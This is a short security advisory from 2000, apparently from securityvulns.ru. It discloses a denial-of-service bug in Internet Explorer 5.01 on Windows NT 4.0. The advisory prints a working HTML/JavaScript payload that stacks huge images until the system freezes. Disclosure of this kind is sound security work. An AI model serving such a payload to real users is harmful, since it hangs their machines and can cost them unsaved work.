Computer Security
[EN] securityvulns.ru no-pyccku




IE5.01 Frozes system on huge images (20.01.2000)

Reproducability:
Open  http://www.security.nnov.ru/files/ie5hang.asp  to  test
vulnerability (save you data before :)))

I  can  reproduce  this  bug on all PCs with Windows NT 4.0 (SP5-6a) +
IE5,  but  reaction is different. Reaction can probably depend on type
of  video  card/video driver and (possibly) mouse driver or mouse type
(COM  or  PS/2).  In  any case system freezes, but on some boxes mouse
cursor still alive.

Problem description:
It's  possible  to  freeze  operation system for a long amount of time
with  100%  CPU  usage  and  almost  without  reaction  to  user input
(including  Ctrl+Alt+Del for NT). It could be made by displaying image
with  huge  width  and height parameters. It's possible to hang system
for  a  long  time  applying  images  with  few  layers.  It's  almost
impossible to kill IE during this process.

Next html code can be used (it applies 7 layers and freezes my Celeron
333 box for a half or hour. Using javascript is not necessary):

<script>
var MS=navigator.appVersion.indexOf("MSIE");
window.isIE5 = (MS>0) && (parseInt(navigator.appVersion.substring(MS+5,
 MS+6)) >= 5);
if(isIE5){
 alert("Lets have fun!");
 document.write("<img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999;
 position:absolute;top:1; left:1;\"><img src=\"3APA3A.GIF\"
 STYLe=\"WIDTH:2999999; position:absolute; top:2; left:2;\">
<img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute;
 top:3; left:3;\"<>img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999;
 position:absolute; top:4; left:4;\">
<img src=\"3APA3A.GIF\"
 STYLe=\"WIDTH:2999999; position:absolute; top:5; left:5;\">
<img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute;
 top:6; left:6;\">
<img src=\"3APA3A.GIF\" STYLe=\"WIDTH:2999999; position:absolute;
 top:7; left:7;\">");
}
else {
        alert("This page must be viewed with MSIE 5");
}
</script>


May  be  this is a problem of graphic subsystem, but i can't reproduce
it with different software.

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod